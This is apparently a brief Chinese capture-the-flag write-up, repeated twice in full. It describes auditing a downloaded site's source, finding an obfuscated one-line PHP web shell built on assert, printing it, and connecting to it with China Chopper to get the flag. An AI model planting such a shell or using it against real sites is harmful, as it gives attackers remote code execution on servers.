首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞
发现一处后门漏洞
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
打开菜刀链接
http://IP地址/www/index.php?post=assert 链接密码 assert 即可获取key
首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞
发现一处后门漏洞
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
打开菜刀链接
http://IP地址/www/index.php?post=assert 链接密码 assert 即可获取key